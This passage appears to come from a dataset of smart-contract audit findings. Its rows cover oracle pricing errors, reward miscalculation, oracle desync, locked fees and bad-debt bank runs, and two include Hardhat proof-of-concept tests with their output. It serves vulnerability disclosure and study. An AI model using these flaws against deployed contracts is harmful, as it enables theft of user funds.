minPrice.mulWadDown(pool.getRate());\\n```\\n +CurveTricryptoOracle#getPrice contains math error that causes LP to be priced completely wrong,high,"CurveTricryptoOracle.sol#L57-L62\\n```\\n (lpPrice(\\n virtualPrice,\\n base.getPrice(tokens[1]),\\n ethPrice,\\n base.getPrice(tokens[0])\\n ) * 1e18) / ethPrice;\\n```\\n\\nAfter the LP price has been calculated in USD it is mistakenly divided by the price of ETH causing the contract to return the LP price in terms of ETH rather than USD. This leads to LP that is massively undervalued causing positions which are actually heavily over collateralized to be liquidated.",Don't divide the price by the price of ETH,Healthy positions are liquidated due to incorrect LP pricing,"```\\n (lpPrice(\\n virtualPrice,\\n base.getPrice(tokens[1]),\\n ethPrice,\\n base.getPrice(tokens[0])\\n ) * 1e18) / ethPrice;\\n```\\n" +CVX/AURA distribution calculation is incorrect and will lead to loss of rewards at the end of each cliff,high,"WAuraPools.sol#L233-L248\\n```\\n if (cliff < totalCliffs) {\\n /// e.g. (new) reduction = (500 - 100) * 2.5 + 700 = 1700;\\n /// e.g. (new) reduction = (500 - 250) * 2.5 + 700 = 1325;\\n /// e.g. (new) reduction = (500 - 400) * 2.5 + 700 = 950;\\n uint256 reduction = ((totalCliffs - cliff) * 5) / 2 + 700;\\n /// e.g. (new) amount = 1e19 * 1700 / 500 = 34e18;\\n /// e.g. (new) amount = 1e19 * 1325 / 500 = 26.5e18;\\n /// e.g. (new) amount = 1e19 * 950 / 500 = 19e17;\\n mintAmount = (mintRequestAmount * reduction) / totalCliffs;\\n\\n /// e.g. amtTillMax = 5e25 - 1e25 = 4e25\\n uint256 amtTillMax = emissionMaxSupply - emissionsMinted;\\n if (mintAmount > amtTillMax) {\\n mintAmount = amtTillMax;\\n }\\n }\\n```\\n\\nThe above code is used to calculate the amount of AURA owed to the user. This calculation is perfectly accurate if the AURA hasn't been minted yet. The problem is that each time a user withdraws, AURA is claimed for ALL vault participants. This means that the rewards will be realized for a majority of users before they themselves withdraw. Since the emissions decrease with each cliff, there will be loss of funds at the end of each cliff.\\nExample: Assume for simplicity there are only 2 cliffs. User A deposits LP to WAuraPools. After some time User B deposits as well. Before the end of the first cliff User A withdraw. This claims all tokens owed to both users A and B which is now sitting in the contract. Assume both users are owed 10 tokens. Now User B waits for the second cliff to end before withdrawing. When calculating his rewards it will give him no rewards since all cliffs have ended. The issue is that the 10 tokens they are owed is already sitting in the contract waiting to be claimed.","I would recommend a hybrid approach. When rewards are claimed upon withdrawal, the reward per token should be cached to prevent loss of tokens that have already been received by the contract. Only unminted AURA should be handled this way.",All users will lose rewards at the end of each cliff due to miscalculation,```\\n if (cliff < totalCliffs) {\\n /// e.g. (new) reduction = (500 - 100) * 2.5 + 700 = 1700;\\n /// e.g. (new) reduction = (500 - 250) * 2.5 + 700 = 1325;\\n /// e.g. (new) reduction = (500 - 400) * 2.5 + 700 = 950;\\n uint256 reduction = ((totalCliffs - cliff) * 5) / 2 + 700;\\n /// e.g. (new) amount = 1e19 * 1700 / 500 = 34e18;\\n /// e.g. (new) amount = 1e19 * 1325 / 500 = 26.5e18;\\n /// e.g. (new) amount = 1e19 * 950 / 500 = 19e17;\\n mintAmount = (mintRequestAmount * reduction) / totalCliffs;\\n\\n /// e.g. amtTillMax = 5e25 - 1e25 = 4e25\\n uint256 amtTillMax = emissionMaxSupply - emissionsMinted;\\n if (mintAmount > amtTillMax) {\\n mintAmount = amtTillMax;\\n }\\n }\\n```\\n +Invalid oracle versions can cause desync of global and local positions making protocol lose funds and being unable to pay back all users,high,"In more details, if there are 2 pending positions with timestamps different by 2 oracle versions and the first of them has invalid oracle version at its timestamp, then there are 2 different position flows possible depending on the time when the position is settled (update transaction called):\\nFor earlier update the flow is: previous position (oracle v1) -> position 1 (oracle v2) -> position 2 (oracle v3)\\nFor later update position 1 is skipped completely (the fees for the position are also not taken) and the flow is: previous position (oracle v1) -> invalidated position 1 (in the other words: previous position again) (oracle v2) -> position 2 (oracle v3)\\nWhile the end result (position 2) is the same, it's possible that pending global position is updated earlier (goes the 1st path), while the local position is updated later (goes the 2nd path). For a short time (between oracle versions 2 and 3), the global position will accumulate everything (including profit and loss) using the pending position 1 long/short/maker values, but local position will accumulate everything using the previous position with different values.\\nConsider the following scenario: Oracle uses granularity = 100. Initially user B opens position maker = 2 with collateral = 100. T=99: User A opens long = 1 with collateral = 100 (pending position long=1 timestamp=100) T=100: Oracle fails to commit this version, thus it becomes invalid T=201: At this point oracle version at timestamp 200 is not yet commited, but the new positions are added with the next timestamp = 300: User A closes his long position (update(0,0,0,0)) (pending position: long=1 timestamp=100; long=0 timestamp=300) At this point, current global long position is still 0 (pending the same as user A local pending positions)\\nT=215: Oracle commits version with timestamp = 200, price = $100 T=220: User B settles (update(2,0,0,0) - keeping the same position). At this point the latest oracle version is the one at timestamp = 200, so this update triggers update of global pending positions, and current latest global position is now long = 1.0 at timestamp = 200. T=315: Oracle commits version with timestamp = 300, price = $90 after settlement of both UserA and UserB, we have the following:\\nGlobal position settlement. It accumulates position [maker = 2.0, long = 1.0] from timestamp = 200 (price=$100) to timestamp = 300 (price=$90). In particular: longPnl = 1*($90-$100) = -$10 makerPnl = -longPnl = +$10\\nUser B local position settlement. It accumulates position [maker = 2.0] from timestamp = 200 to timestamp = 300, adding makerPnl ($10) to user B collateral. So user B collateral = $110\\nUser A local position settlement. When accumulating, pending position 1 (long = 1, timestamp = 100) is invalidated to previous position (long = 0) and also fees are set to 0 by invalidation. So user A local accumulates position [long = 0] from timestamp = 0 to timestamp = 300 (next pending position), this doesn't change collateral at all (remains $100). Then the next pending position [long = 0] becomes the latest position (basically position of long=1 was completely ignored as if it has not existed).\\nResult: User A deposited $100, User B deposited $100 (total $200 deposited) after the scenario above: User A has collateral $110, User B has collateral $100 (total $210 collateral withdrawable) However, protocol only has $200 deposited. This means that the last user will be unable to withdraw the last $10 since protocol doesn't have it, leading to a user loss of funds.\\nThe scenario above is demonstrated in the test, add this to test/unit/market/Market.test.ts:\\n```\\nit('panprog global-local desync', async () => {\\n const positionMaker = parse6decimal('2.000')\\n const positionLong = parse6decimal('1.000')\\n const collateral = parse6decimal('100')\\n\\n const oracleVersion = {\\n price: parse6decimal('100'),\\n timestamp: TIMESTAMP,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion.timestamp).returns(oracleVersion)\\n oracle.status.returns([oracleVersion, oracleVersion.timestamp + 100])\\n oracle.request.returns()\\n\\n dsu.transferFrom.whenCalledWith(userB.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(userB).update(userB.address, positionMaker, 0, 0, collateral, false)\\n\\n const oracleVersion2 = {\\n price: parse6decimal('100'),\\n timestamp: TIMESTAMP + 100,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion2.timestamp).returns(oracleVersion2)\\n oracle.status.returns([oracleVersion2, oracleVersion2.timestamp + 100])\\n oracle.request.returns()\\n\\n dsu.transferFrom.whenCalledWith(user.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(user).update(user.address, 0, positionLong, 0, collateral, false)\\n\\n var info = await market.locals(userB.address);\\n console.log(""collateral deposit maker: "" + info.collateral);\\n var info = await market.locals(user.address);\\n console.log(""collateral deposit long: "" + info.collateral);\\n\\n // invalid oracle version\\n const oracleVersion3 = {\\n price: 0,\\n timestamp: TIMESTAMP + 200,\\n valid: false,\\n }\\n oracle.at.whenCalledWith(oracleVersion3.timestamp).returns(oracleVersion3)\\n\\n // next oracle version is valid\\n const oracleVersion4 = {\\n price: parse6decimal('100'),\\n timestamp: TIMESTAMP + 300,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion4.timestamp).returns(oracleVersion4)\\n\\n // still returns oracleVersion2, because nothing commited for version 3, and version 4 time has passed but not yet commited\\n oracle.status.returns([oracleVersion2, oracleVersion4.timestamp + 100])\\n oracle.request.returns()\\n\\n // reset to 0\\n await market.connect(user).update(user.address, 0, 0, 0, 0, false)\\n\\n // oracleVersion4 commited\\n oracle.status.returns([oracleVersion4, oracleVersion4.timestamp + 100])\\n oracle.request.returns()\\n\\n // settle\\n await market.connect(userB).update(userB.address, positionMaker, 0, 0, 0, false)\\n\\n const oracleVersion5 = {\\n price: parse6decimal('90'),\\n timestamp: TIMESTAMP + 400,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion5.timestamp).returns(oracleVersion5)\\n oracle.status.returns([oracleVersion5, oracleVersion5.timestamp + 100])\\n oracle.request.returns()\\n\\n // settle\\n await market.connect(userB).update(userB.address, positionMaker, 0, 0, 0, false)\\n await market.connect(user).update(user.address, 0, 0, 0, 0, false)\\n\\n var info = await market.locals(userB.address);\\n console.log(""collateral maker: "" + info.collateral);\\n var info = await market.locals(user.address);\\n console.log(""collateral long: "" + info.collateral);\\n})\\n```\\n\\nConsole output for the code:\\n```\\ncollateral deposit maker: 100000000\\ncollateral deposit long: 100000000\\ncollateral maker: 110000028\\ncollateral long: 100000000\\n```\\n\\nMaker has a bit more than $110 in the end, because he also earns funding and interest during the short time when ephemeral long position is active (but user A doesn't pay these fees).","The issue is that positions with invalid oracle versions are ignored until the first valid oracle version, however the first valid version can be different for global and local positions. One of the solutions I see is to introduce a map of position timestamp -> oracle version to settle, which will be filled by global position processing. Local position processing will follow the same path as global using this map, which should eliminate possibility of different paths for global and local positions.\\nIt might seem that the issue can only happen with exactly 1 oracle version between invalid and valid positions. However, it's also possible that some non-requested oracle versions are commited (at some random timestamps between normal oracle versions) and global position will go via the route like t100[pos0]->t125[pos1]->t144[pos1]->t200[pos2] while local one will go t100[pos0]->t200[pos2] OR it can also go straight to t300 instead of t200 etc. So the exact route can be anything, and local oracle will have to follow it, that's why I suggest a path map.\\nThere might be some other solutions possible.","Any time the oracle skips a version (invalid version), it's likely that global and local positions for different users who try to trade during this time will desync, leading to messed up accounting and loss of funds for users or protocol, potentially triggering a bank run with the last user being unable to withdraw all funds.\\nThe severity of this issue is high, because while invalid versions are normally a rare event, however in the current state of the codebase there is a bug that pyth oracle requests are done using this block timestamp instead of granulated future time (as positions do), which leads to invalid oracle versions almost for all updates (that bug is reported separately). Due to this other bug, the situation described in this issue will arise very often by itself in a normal flow of the user requests, so it's almost 100% that internal accounting for any semi-active market will be broken and total user collateral will deviate away from real deposited funds, meaning the user funds loss.\\nBut even with that other bug fixed, the invalid oracle version is a normal protocol event and even 1 such event might be enough to break internal market accounting.","```\\nit('panprog global-local desync', async () => {\\n const positionMaker = parse6decimal('2.000')\\n const positionLong = parse6decimal('1.000')\\n const collateral = parse6decimal('100')\\n\\n const oracleVersion = {\\n price: parse6decimal('100'),\\n timestamp: TIMESTAMP,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion.timestamp).returns(oracleVersion)\\n oracle.status.returns([oracleVersion, oracleVersion.timestamp + 100])\\n oracle.request.returns()\\n\\n dsu.transferFrom.whenCalledWith(userB.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(userB).update(userB.address, positionMaker, 0, 0, collateral, false)\\n\\n const oracleVersion2 = {\\n price: parse6decimal('100'),\\n timestamp: TIMESTAMP + 100,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion2.timestamp).returns(oracleVersion2)\\n oracle.status.returns([oracleVersion2, oracleVersion2.timestamp + 100])\\n oracle.request.returns()\\n\\n dsu.transferFrom.whenCalledWith(user.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(user).update(user.address, 0, positionLong, 0, collateral, false)\\n\\n var info = await market.locals(userB.address);\\n console.log(""collateral deposit maker: "" + info.collateral);\\n var info = await market.locals(user.address);\\n console.log(""collateral deposit long: "" + info.collateral);\\n\\n // invalid oracle version\\n const oracleVersion3 = {\\n price: 0,\\n timestamp: TIMESTAMP + 200,\\n valid: false,\\n }\\n oracle.at.whenCalledWith(oracleVersion3.timestamp).returns(oracleVersion3)\\n\\n // next oracle version is valid\\n const oracleVersion4 = {\\n price: parse6decimal('100'),\\n timestamp: TIMESTAMP + 300,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion4.timestamp).returns(oracleVersion4)\\n\\n // still returns oracleVersion2, because nothing commited for version 3, and version 4 time has passed but not yet commited\\n oracle.status.returns([oracleVersion2, oracleVersion4.timestamp + 100])\\n oracle.request.returns()\\n\\n // reset to 0\\n await market.connect(user).update(user.address, 0, 0, 0, 0, false)\\n\\n // oracleVersion4 commited\\n oracle.status.returns([oracleVersion4, oracleVersion4.timestamp + 100])\\n oracle.request.returns()\\n\\n // settle\\n await market.connect(userB).update(userB.address, positionMaker, 0, 0, 0, false)\\n\\n const oracleVersion5 = {\\n price: parse6decimal('90'),\\n timestamp: TIMESTAMP + 400,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion5.timestamp).returns(oracleVersion5)\\n oracle.status.returns([oracleVersion5, oracleVersion5.timestamp + 100])\\n oracle.request.returns()\\n\\n // settle\\n await market.connect(userB).update(userB.address, positionMaker, 0, 0, 0, false)\\n await market.connect(user).update(user.address, 0, 0, 0, 0, false)\\n\\n var info = await market.locals(userB.address);\\n console.log(""collateral maker: "" + info.collateral);\\n var info = await market.locals(user.address);\\n console.log(""collateral long: "" + info.collateral);\\n})\\n```\\n" +Protocol fee from Market.sol is locked,high,"Here is `MarketFactory#fund` function:\\n```\\n function fund(IMarket market) external {\\n if (!instances(IInstance(address(market)))) revert FactoryNotInstanceError();\\n market.claimFee();\\n }\\n```\\n\\nThis is `Market#claimFee` function:\\n```\\n function claimFee() external {\\n Global memory newGlobal = _global.read();\\n\\n if (_claimFee(address(factory()), newGlobal.protocolFee)) newGlobal.protocolFee = UFixed6Lib.ZERO;\\n // rest of code\\n }\\n```\\n\\nThis is the internal `_claimFee` function:\\n```\\n function _claimFee(address receiver, UFixed6 fee) private returns (bool) {\\n if (msg.sender != receiver) return false;\\n\\n token.push(receiver, UFixed18Lib.from(fee));\\n emit FeeClaimed(receiver, fee);\\n return true;\\n }\\n```\\n\\nAs we can see, when `MarketFactory#fund` is called, Market#claimFee gets called which will send the protocolFee to msg.sender(MarketFacttory). When you check through the MarketFactory contract, there is no place where another address(such as protocol multisig, treasury or an EOA) is approved to spend MarketFactory's funds, and also, there is no function in the contract that can be used to transfer MarketFactory's funds. This causes locking of the protocol fees.",Consider adding a `withdraw` function that protocol can use to get the protocolFee out of the contract. You can have the `withdraw` function transfer the MarketFactory balance to the treasury or something.,Protocol fees cannot be withdrawn,```\\n function fund(IMarket market) external {\\n if (!instances(IInstance(address(market)))) revert FactoryNotInstanceError();\\n market.claimFee();\\n }\\n```\\n +"PythOracle:if price.expo is less than 0, wrong prices will be recorded",high,"Here is PythOracle#_recordPrice function:\\n```\\n function _recordPrice(uint256 oracleVersion, PythStructs.Price memory price) private {\\n _prices[oracleVersion] = Fixed6Lib.from(price.price).mul(\\n Fixed6Lib.from(SafeCast.toInt256(10 ** SafeCast.toUint256(price.expo > 0 ? price.expo : -price.expo)))\\n );\\n _publishTimes[oracleVersion] = price.publishTime;\\n }\\n```\\n\\nIf price is 5e-5 for example, it will be recorded as 5e5 If price is 5e-6, it will be recorded as 5e6.\\nAs we can see, there is a massive deviation in recorded price from actual price whenever price's exponent is negative","In PythOracle.sol, `_prices` mapping should not be `mapping(uint256 => Fixed6) private _prices;` Instead, it should be `mapping(uint256 => Price) private _prices;`, where Price is a struct that stores the price and expo:\\n```\\nstruct Price{\\n Fixed6 price,\\n int256 expo\\n}\\n```\\n\\nThis way, the price exponents will be preserved, and can be used to scale the prices correctly wherever it is used.","Wrong prices will be recorded. For example, If priceA is 5e-5, and priceB is 5e-6. But due to the wrong conversion,\\nThere is a massive change in price(5e5 against 5e-5)\\nwe know that priceA is ten times larger than priceB, but priceA will be recorded as ten times smaller than priceB. Unfortunately, current payoff functions may not be able to take care of these discrepancies","```\\n function _recordPrice(uint256 oracleVersion, PythStructs.Price memory price) private {\\n _prices[oracleVersion] = Fixed6Lib.from(price.price).mul(\\n Fixed6Lib.from(SafeCast.toInt256(10 ** SafeCast.toUint256(price.expo > 0 ? price.expo : -price.expo)))\\n );\\n _publishTimes[oracleVersion] = price.publishTime;\\n }\\n```\\n" +Vault.sol: `settle`ing the 0 address will disrupt accounting,high,"Within `Vault#_loadContext` function, the context.global is the account of the 0 address, while context.local is the account of the address to be updated or settled:\\n```\\nfunction _loadContext(address account) private view returns (Context memory context) {\\n // rest of code\\n context.global = _accounts[address(0)].read();\\n context.local = _accounts[account].read();\\n context.latestCheckpoint = _checkpoints[context.global.latest].read();\\n}\\n```\\n\\nIf a user settles the 0 address, the global account will be updated with wrong data.\\nHere is the _settle logic:\\n```\\nfunction _settle(Context memory context) private {\\n // settle global positions\\n while (\\n context.global.current > context.global.latest &&\\n _mappings[context.global.latest + 1].read().ready(context.latestIds)\\n ) {\\n uint256 newLatestId = context.global.latest + 1;\\n context.latestCheckpoint = _checkpoints[newLatestId].read();\\n (Fixed6 collateralAtId, UFixed6 feeAtId, UFixed6 keeperAtId) = _collateralAtId(context, newLatestId);\\n context.latestCheckpoint.complete(collateralAtId, feeAtId, keeperAtId);\\n context.global.processGlobal(\\n newLatestId,\\n context.latestCheckpoint,\\n context.latestCheckpoint.deposit,\\n context.latestCheckpoint.redemption\\n );\\n _checkpoints[newLatestId].store(context.latestCheckpoint);\\n }\\n\\n // settle local position\\n if (\\n context.local.current > context.local.latest &&\\n _mappings[context.local.current].read().ready(context.latestIds)\\n ) {\\n uint256 newLatestId = context.local.current;\\n Checkpoint memory checkpoint = _checkpoints[newLatestId].read();\\n context.local.processLocal(\\n newLatestId,\\n checkpoint,\\n context.local.deposit,\\n context.local.redemption\\n );\\n }\\n}\\n```\\n\\nIf settle is called on 0 address, _loadContext will give context.global and context.local same data. In the _settle logic, after the global account(0 address) is updated with the correct data in the `while` loop(specifically through the processGlobal function), the global account gets reupdated with wrong data within the `if` statement through the processLocal function.\\nWrong assets and shares will be recorded. The global account's assets and shares should be calculated with toAssetsGlobal and toSharesGlobal respectively, but now, they are calculated with toAssetsLocal and toSharesLocal.\\ntoAssetsGlobal subtracts the globalKeeperFees from the global deposited assets, while toAssetsLocal subtracts globalKeeperFees/Checkpoint.count fees from the local account's assets.\\nSo in the case of settling the 0 address, where global account and local account are both 0 address, within the while loop of _settle function, depositedAssets-globalKeeperFees is recorded for address(0), but then, in the `if` statement, depositedAssets-(globalAssets/Checkpoint.count) is recorded for address(0)\\nAnd within the `Vault#_saveContext` function, context.global is saved before context.local, so in this case, context.global(which is 0 address with correct data) is overridden with context.local(which is 0 address with wrong data).","I believe that the ability to settle the 0 address is intended, so an easy fix is to save local context before saving global context: Before:\\n```\\n function _saveContext(Context memory context, address account) private {\\n _accounts[address(0)].store(context.global);\\n _accounts[account].store(context.local);\\n _checkpoints[context.currentId].store(context.currentCheckpoint);\\n }\\n```\\n\\nAfter:\\n```\\n function _saveContext(Context memory context, address account) private {\\n _accounts[account].store(context.local);\\n _accounts[address(0)].store(context.global);\\n _checkpoints[context.currentId].store(context.currentCheckpoint);\\n }\\n```\\n","The global account will be updated with wrong data, that is, global assets and shares will be higher than it should be because lower keeper fees was deducted.",```\\nfunction _loadContext(address account) private view returns (Context memory context) {\\n // rest of code\\n context.global = _accounts[address(0)].read();\\n context.local = _accounts[account].read();\\n context.latestCheckpoint = _checkpoints[context.global.latest].read();\\n}\\n```\\n +"During oracle provider switch, if it is impossible to commit the last request of previous provider, then the oracle will get stuck (no price updates) without any possibility to fix it",medium,"The way oracle provider switch works is the following:\\n`Oracle.update()` is called to set a new provider. This is only allowed if there is no other provider switch pending.\\nThere is a brief transition period, when both the previous provider and a new provider are active. This is to ensure that all the requests made to the previous oracle are commited before switching to a new provider. This is handled by the `Oracle._handleLatest()` function, in particular the switch to a new provider occurs only when `Oracle.latestStale()` returns true. The lines of interest to us are:\\n```\\n uint256 latestTimestamp = global.latest == 0 ? 0 : oracles[global.latest].provider.latest().timestamp;\\n if (uint256(oracles[global.latest].timestamp) > latestTimestamp) return false;\\n```\\n\\n`latestTimestamp` - is the timestamp of last commited price for the previous provider `oracles[global.latest].timestamp` is the timestamp of the last requested price for the previous provider The switch doesn't occur, until last commited price is equal to or after the last request timestamp for the previous provider. 3. The functions to `commit` the price are in PythOracle: `commitRequested` and `commit`. 3.1. `commitRequested` requires publish timestamp of the pyth price to be within MIN_VALID_TIME_AFTER_VERSION..MAX_VALID_TIME_AFTER_VERSION from request time. It is possible that pyth price with signature in this time period is not available for different reasons (pyth price feed is down, keeper was down during this period and didn't collect price and signature):\\n```\\n uint256 versionToCommit = versionList[versionIndex];\\n PythStructs.Price memory pythPrice = _validateAndGetPrice(versionToCommit, updateData);\\n```\\n\\n`versionList` is an array of oracle request timestamps. And `_validateAndGetPrice()` filters the price within the interval specified (if it is not in the interval, it will revert):\\n```\\n return pyth.parsePriceFeedUpdates{value: pyth.getUpdateFee(updateDataList)}(\\n updateDataList,\\n idList,\\n SafeCast.toUint64(oracleVersion + MIN_VALID_TIME_AFTER_VERSION),\\n SafeCast.toUint64(oracleVersion + MAX_VALID_TIME_AFTER_VERSION)\\n )[0].price;\\n```\\n\\n3.2. `commit` can not be done with timestamp older than the first oracle request timestamp: if any oracle request is still active, it will simply redirect to commitRequested:\\n```\\n if (versionList.length > nextVersionIndexToCommit && oracleVersion >= versionList[nextVersionIndexToCommit]) {\\n commitRequested(nextVersionIndexToCommit, updateData);\\n return;\\n }\\n```\\n\\nAll new oracle requests are directed to a new provider, this means that previous provider can not receive any new requests (which allows to finalize it):\\n```\\n function request(address account) external onlyAuthorized {\\n (OracleVersion memory latestVersion, uint256 currentTimestamp) = oracles[global.current].provider.status();\\n\\n oracles[global.current].provider.request(account);\\n oracles[global.current].timestamp = uint96(currentTimestamp);\\n _updateLatest(latestVersion);\\n }\\n```\\n\\nSo the following scenario is possible: timestamp=69: oracle price is commited for timestamp=50 timestamp=70: user requests to open position (Oracle.request() is made) timestamp=80: owner calls `Oracle.update()` timestamp=81: pyth price signing service goes offline (or keeper goes offline) ... timestamp=120: signing service goes online again. timestamp=121: another user requests to open position (Oracle.request() is made, directed to new provider) timestamp=200: new provider's price is commited (commitRequested is called with timestamp=121)\\nAt this time, `Oracle.latest()` will return price at timestamp=50. It will ignore new provider's latest commit, because previous provider last request (timestamp=70) is still not commited. Any new price requests and commits to a new provider will be ignored, but the previous provider can not be commited due to absence of prices in the valid time range. It is also not possible to change oracle for the market, because there is no such function. It is also impossible to cancel provider update and impossible to change the provider back to previous one, as all of these will revert.\\nIt is still possible for the owner to manually whitelist some address to call `request()` for the previous provider. However, this situation provides even worse result. While the latest version for the previous provider will now be later than the last request, so it will let the oracle switch to new provider, however `oracle.status()` will briefly return invalid oracle version, because it will return oracle version at the timestamp = last request before the provider switch, which will be invalid (the new request will be after that timestamp):\\nThis can be abused by some user who can backrun the previous provider oracle commit (or commit himself) and use the invalid oracle returned by `status()` (oracle version with price = 0). Market doesn't expect the oracle status to return invalid price (it is expected to be always valid), so it will use this invalid price as if it's a normal price = 0, which will totally break the market:\\nSo if the oracle provider switch becomes stuck, there is no way out and the market will become stale, not allowing any user to withdraw the funds.","There are multiple possible ways to fix this. For example, allow to finalize previous provider if the latest `commit` from the new provider is newer than the latest `commit` from the previous provider by `GRACE_PERIOD` seconds. Or allow PythOracle to `commit` directly (instead of via commitRequested) if the `commit` oracleVersion is newer than the last request by `GRACE_PERIOD` seconds.","Issue During oracle provider switch, if it is impossible to commit the last request of previous provider, then the oracle will get stuck (no price updates) without any possibility to fix it\\nSwitching oracle provider can make the oracle stuck and stop updating new prices. This will mean the market will become stale and will revert on all requests from user, disallowing to withdraw funds, bricking the contract entirely.",```\\n uint256 latestTimestamp = global.latest == 0 ? 0 : oracles[global.latest].provider.latest().timestamp;\\n if (uint256(oracles[global.latest].timestamp) > latestTimestamp) return false;\\n```\\n +Bad debt (shortfall) liquidation leaves liquidated user in a negative collateral balance which can cause bank run and loss of funds for the last users to withdraw,medium,"Consider the following scenario:\\nUser1 and User2 are the only makers in the market each with maker=50 position and each with collateral=500. (price=$100)\\nA new user comes into the market and opens long=10 position with collateral=10.\\nPrice drops to $90. Some liquidator liquidates the user, taking $10 liquidation fee. User is now left with the negative collateral = -$100\\nSince User1 and User2 were the other party for the user, each of them has a profit of $50 (both users have collateral=550)\\nAt this point protocol has total funds from deposit of User1($500) + User2($500) + new user($10) - liquidator($10) = $1000. However, User1 and User2 have total collateral of 1100.\\nUser1 closes position and withdraws $550. This succeeds. Protocol now has only $450 funds remaining and 550 collateral owed to User2.\\nUser2 closes position and tries to withdraw $550, but fails, because protocol doesn't have enough funds. User2 can only withdraw $450, effectively losing $100.\\nSince all users know about this feature, after bad debt they will race to be the first to withdraw, triggering a bank run.\\nThe scenario above is demonstrated in the test, add this to test/unit/market/Market.test.ts:\\n```\\nit('panprog bad debt liquidation bankrun', async () => {\\n\\n function setupOracle(price: string, timestamp : number, nextTimestamp : number) {\\n const oracleVersion = {\\n price: parse6decimal(price),\\n timestamp: timestamp,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion.timestamp).returns(oracleVersion)\\n oracle.status.returns([oracleVersion, nextTimestamp])\\n oracle.request.returns()\\n }\\n\\n var riskParameter = {\\n maintenance: parse6decimal('0.01'),\\n takerFee: parse6decimal('0.00'),\\n takerSkewFee: 0,\\n takerImpactFee: 0,\\n makerFee: parse6decimal('0.00'),\\n makerImpactFee: 0,\\n makerLimit: parse6decimal('1000'),\\n efficiencyLimit: parse6decimal('0.2'),\\n liquidationFee: parse6decimal('0.50'),\\n minLiquidationFee: parse6decimal('10'),\\n maxLiquidationFee: parse6decimal('1000'),\\n utilizationCurve: {\\n minRate: parse6decimal('0.0'),\\n maxRate: parse6decimal('1.00'),\\n targetRate: parse6decimal('0.10'),\\n targetUtilization: parse6decimal('0.50'),\\n },\\n pController: {\\n k: parse6decimal('40000'),\\n max: parse6decimal('1.20'),\\n },\\n minMaintenance: parse6decimal('10'),\\n virtualTaker: parse6decimal('0'),\\n staleAfter: 14400,\\n makerReceiveOnly: false,\\n }\\n var marketParameter = {\\n fundingFee: parse6decimal('0.0'),\\n interestFee: parse6decimal('0.0'),\\n oracleFee: parse6decimal('0.0'),\\n riskFee: parse6decimal('0.0'),\\n positionFee: parse6decimal('0.0'),\\n maxPendingGlobal: 5,\\n maxPendingLocal: 3,\\n settlementFee: parse6decimal('0'),\\n makerRewardRate: parse6decimal('0'),\\n longRewardRate: parse6decimal('0'),\\n shortRewardRate: parse6decimal('0'),\\n makerCloseAlways: false,\\n takerCloseAlways: false,\\n closed: false,\\n }\\n \\n await market.connect(owner).updateRiskParameter(riskParameter);\\n await market.connect(owner).updateParameter(marketParameter);\\n\\n setupOracle('100', TIMESTAMP, TIMESTAMP + 100);\\n\\n var collateral = parse6decimal('500')\\n dsu.transferFrom.whenCalledWith(userB.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(userB).update(userB.address, parse6decimal('50.000'), 0, 0, collateral, false)\\n dsu.transferFrom.whenCalledWith(userC.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(userC).update(userC.address, parse6decimal('50.000'), 0, 0, collateral, false)\\n\\n var collateral = parse6decimal('10')\\n dsu.transferFrom.whenCalledWith(user.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(user).update(user.address, 0, parse6decimal('10.000'), 0, collateral, false)\\n\\n var info = await market.locals(user.address);\\n var infoB = await market.locals(userB.address);\\n var infoC = await market.locals(userC.address);\\n console.log(""collateral before liquidation: "" + info.collateral + "" + "" + infoB.collateral + "" + "" + infoC.collateral + "" = "" + \\n info.collateral.add(infoB.collateral).add(infoC.collateral));\\n\\n setupOracle('100', TIMESTAMP + 100, TIMESTAMP + 200);\\n setupOracle('90', TIMESTAMP + 200, TIMESTAMP + 300);\\n // liquidate\\n const EXPECTED_LIQUIDATION_FEE = parse6decimal('10')\\n dsu.transfer.whenCalledWith(liquidator.address, EXPECTED_LIQUIDATION_FEE.mul(1e12)).returns(true)\\n dsu.balanceOf.whenCalledWith(market.address).returns(COLLATERAL.mul(1e12))\\n await market.connect(liquidator).update(user.address, 0, 0, 0, EXPECTED_LIQUIDATION_FEE.mul(-1), true)\\n\\n setupOracle('90', TIMESTAMP + 200, TIMESTAMP + 300);\\n await market.connect(userB).update(userB.address, 0, 0, 0, 0, false)\\n await market.connect(userC).update(userC.address, 0, 0, 0, 0, false)\\n\\n var info = await market.locals(user.address);\\n var infoB = await market.locals(userB.address);\\n var infoC = await market.locals(userC.address);\\n console.log(""collateral after liquidation: "" + info.collateral + "" + "" + infoB.collateral + "" + "" + infoC.collateral + "" = "" + \\n info.collateral.add(infoB.collateral).add(infoC.collateral));\\n})\\n```\\n\\nConsole output for the code:\\n```\\ncollateral before liquidation: 10000000 + 500000000 + 500000000 = 1010000000\\ncollateral after liquidation: -100000080 + 550000000 + 550000000 = 999999920\\n```\\n\\nAfter initial total deposit of $1010, in the end liquidated user will just abandon his account, and remaining user accounts have $550+$550=$1100 but only $1000 funds in the protocol to withdraw.","There should be no negative collateral accounts with 0-position and no incentive to cover shortfall. When liquidated, if account is left with negative collateral, the bad debt should be added to the opposite position pnl (long position bad debt should be socialized between short position holders) or maybe to makers pnl only (socialized between makers). The account will have to be left with collateral = 0.\\nImplementation details for such solution can be tricky due to settlement in the future (pnl is not known at the time of liquidation initiation). Possibly a 2nd step of bad debt liquidation should be added: a keeper will call the user account to socialize bad debt and get some reward for this. Although this is not the best solution, because users who close their positions before the keeper socializes the bad debt, will be able to avoid this social loss. One of the solutions for this will be to introduce delayed withdrawals and delayed socialization (like withdrawals are allowed only after 5 oracle versions and socialization is applied to all positions opened before socialization and still active or closed within 5 last oracle versions), but it will make protocol much more 